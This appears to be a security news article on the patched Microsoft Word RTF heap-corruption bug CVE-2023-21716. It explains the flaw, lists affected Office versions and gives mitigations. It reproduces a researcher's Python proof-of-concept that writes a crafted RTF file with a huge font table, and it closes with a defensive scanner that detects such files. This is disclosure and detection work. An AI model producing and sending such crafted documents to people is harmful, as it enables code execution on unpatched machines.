Security researcher Joshua J. Drake (@jduck) has released the details and a proof-of-concept for the critical Microsoft Word RTF vulnerability that Microsoft patched in its February 2023 Patch Tuesday update.
In that February 2023 release, Microsoft fixed 75 security vulnerabilities across its products, including three zero-days. The same release also fixed a critical-severity remote code execution (RCE) bug in Microsoft Word, CVE-2023-21716, rated CVSS 9.8/10. Because exploitation requires nothing more than the victim opening a crafted document, the bug is an obvious candidate for ransomware operators' phishing campaigns and a major concern for users.
Microsoft Word RCE (CVE-2023-21716)
CVE-2023-21716 is a flaw in Microsoft Office's wwlib (the core Word library) that allows an attacker to achieve remote code execution with the privileges of the victim who opens a malicious RTF document. The attacker can deliver such a file as an email attachment or by other means.
The vulnerability lies in Word's RTF parser, which suffers heap corruption when it handles a font table (\fonttbl) containing an excessive number of font entries (\f###). While processing the fonts, the font ID (the number after \f) is loaded with a sign-extending instruction, so for sufficiently high IDs the upper 16 bits of edx are filled with 0xffff. The subsequent memory write then corrupts the heap by storing the font's code page at a negative offset from the buffer pointed to by esi. This out-of-bounds write can be turned into arbitrary code execution with the privileges of the victim who opens the malicious RTF document.
Exploitation therefore only requires getting the victim to open the crafted file. Opening it triggers the corruption, and the attacker gains code execution with the victim's privileges, which can be enough to take control of the victim's computer.
Affected Versions of MS Word
According to the researcher, this vulnerability affects at least the following versions of Microsoft Office:
- Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
- Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)
- Microsoft Office 2013
- Microsoft Office 2010
- Microsoft Office 2007
Older versions may also be affected but were not tested.
> CVE-2023-21716 Python PoC (take 2)
>
> `open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))`
>
> — Joshua J. Drake (@jduck) March 5, 2023
CVE-2023-21716 PoC Exploit Code
{% highlight python %}
#!/usr/bin/python
#
# PoC for:
# Microsoft Word RTF Font Table Heap Corruption Vulnerability
#
# by Joshua J. Drake (@jduck)
#
import sys

# allow overriding the number of fonts
num = 32761
if len(sys.argv) > 1:
    num = int(sys.argv[1])

# bytes literals so the script runs under both Python 2 and Python 3
f = open("tezt.rtf", "wb")
f.write(b"{\\rtf1{\n{\\fonttbl")
for i in range(num):
    f.write(b"{\\f%dA;}\n" % i)
f.write(b"}\n")
f.write(b"{\\rtlch it didn't crash?? no calc?! BOO!!!}\n")
f.write(b"}}\n")
f.close()
{% endhighlight %}
Mitigation for MS Word RCE (CVE-2023-21716)
Microsoft addressed the issue in the February 2023 Patch Tuesday update.
Users should apply the patch as soon as possible, and should remain cautious when opening email attachments or downloading files from the internet, particularly from unfamiliar senders or sources.
Additionally, Microsoft Office 2010 and later open documents from untrusted sources in Protected View, which limits the damage a malicious document can do. Protected View is in effect when this vulnerability triggers, so an additional sandbox-escape vulnerability would be required to gain full privileges.
Removing the file association for the .rtf extension is not an effective workaround: Word still parses the RTF content when the same file arrives with a .doc extension, so the vulnerable code is reached anyway.
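As an added example (not code from this page or from Drake's advisory), the scanner below applies two points made above: it looks for the trigger described in the vulnerability section, a \fonttbl group with an excessive number of \fN entries, and it inspects file content rather than the file extension, so an RTF payload renamed to .doc is still caught. The thresholds SUSPICIOUS_FONT_COUNT and the 0x7FFF bound are assumptions chosen for illustration, not values from the advisory, and the sample documents are constructed inline.

```python
#!/usr/bin/env python3
"""Content-based scanner for oversized RTF font tables (the CVE-2023-21716 trigger)."""
import re
from dataclasses import dataclass
from typing import List

RTF_MAGIC = b"{\\rtf"
# Assumed detection thresholds (not from the advisory): the font id is sign-extended
# from 16 bits, so ids outside 0..0x7FFF are treated as hostile, and a font table with
# more entries than any real document needs is treated as suspicious.
MAX_SIGNED_16 = 0x7FFF
SUSPICIOUS_FONT_COUNT = 1024

# \f followed immediately by a (possibly negative) number, e.g. \f0 or \f32760.
# \fonttbl, \fcharset0 and \fswiss do not match because a letter follows the f.
FONT_ID_RE = re.compile(rb"\\f(-?\d+)")


@dataclass
class FontTableReport:
    is_rtf: bool
    font_count: int
    max_font_id: int
    suspicious: bool


def extract_fonttbl(data: bytes) -> bytes:
    """Return the first {\\fonttbl ...} group, honoring nested groups and \\{ \\} escapes."""
    start = data.find(b"{\\fonttbl")
    if start < 0:
        return b""
    depth = 0
    i = start
    while i < len(data):
        c = data[i]
        if c == 0x5C:            # backslash: skip the escaped character (\{, \}, \\)
            i += 2
            continue
        if c == 0x7B:            # '{' opens a nested group
            depth += 1
        elif c == 0x7D:          # '}' closes one; depth 0 ends the font table
            depth -= 1
            if depth == 0:
                return data[start:i + 1]
        i += 1
    return data[start:]          # unterminated group: scan what is there


def scan_bytes(data: bytes) -> FontTableReport:
    """Scan raw document bytes, whatever the file extension says."""
    if not data.lstrip().startswith(RTF_MAGIC):
        return FontTableReport(False, 0, -1, False)
    ids: List[int] = [int(m) for m in FONT_ID_RE.findall(extract_fonttbl(data))]
    max_id = max(ids) if ids else -1
    out_of_range = any(i < 0 or i > MAX_SIGNED_16 for i in ids)
    suspicious = len(ids) > SUSPICIOUS_FONT_COUNT or out_of_range
    return FontTableReport(True, len(ids), max_id, suspicious)


def scan_file(path: str) -> FontTableReport:
    """Open by path; only the content is inspected, so a .doc extension changes nothing."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


# Constructed sample: a benign two-font document with escaped braces in the body.
BENIGN_RTF = (
    b"{\\rtf1\\ansi\\deff0"
    b"{\\fonttbl{\\f0\\fswiss\\fcharset0 Arial;}{\\f1\\froman\\fcharset0 Times New Roman;}}"
    b"\\f0\\fs24 Quarterly report \\{draft\\}\\f1  end.\\par}"
)


def build_oversized_rtf(num_fonts: int = 32761) -> bytes:
    """Constructed sample with the same shape as the published PoC: one \\fN entry per font."""
    fonts = b"".join(b"{\\f%dA;}\n" % i for i in range(num_fonts))
    return b"{\\rtf1{\n{\\fonttbl" + fonts + b"}\n{\\rtlch test}\n}}\n"


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, scan_file(path))
    if len(sys.argv) == 1:
        print("benign:   ", scan_bytes(BENIGN_RTF))
        print("oversized:", scan_bytes(build_oversized_rtf()))
```

Run it with no arguments to compare the two constructed samples, or pass file paths (any extension) to scan real attachments; a mail gateway or EDR rule would key off the same two signals, entry count and out-of-range font IDs, rather than off the .rtf extension.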